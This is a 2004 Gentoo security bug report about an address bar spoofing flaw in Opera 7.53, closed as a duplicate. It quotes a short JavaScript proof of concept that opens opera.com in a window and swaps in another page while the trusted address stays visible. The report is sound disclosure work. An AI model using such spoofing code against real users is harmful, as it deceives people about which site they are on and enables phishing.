Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 58511 - net-www/opera 7.53 still has spoofing issues
Summary: net-www/opera 7.53 still has spoofing issues
Status: RESOLVED DUPLICATE of bug 59503
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High minor (vote)
Assignee: Gentoo Security
URL: http://archives.neohapsis.com/archive...
Whiteboard: A4 [upstream]
Keywords:
Depends on:
Blocks:
 
Reported: 2004-07-27 01:01 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2011-10-30 22:37 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-07-27 01:01:44 UTC
I report you about 
 Opera 7.53 (Build 3850) Address Bar Spoofing Issue, 
 tested on Windows OS. 
 


==== begin of PoC 
 [script] 
 function fake() { 
   oc=window.open('http://www.opera.com/', '','location=1'); 
   oc.location.replace('http://www.example.com'); 
 } 
 [/script] 
 [a href="javascript:void(0);" 
 onClick="fake()"]http://www.opera.com/[/a] 
 ==== end of PoC 

Also vulnerable on Linux.
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2004-07-30 09:58:27 UTC
Waiting for upstream fix
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-08-05 04:37:42 UTC
Woops. Closing the old one as the new one contains fixes for multiple issues not just this one.

*** This bug has been marked as a duplicate of 59503 ***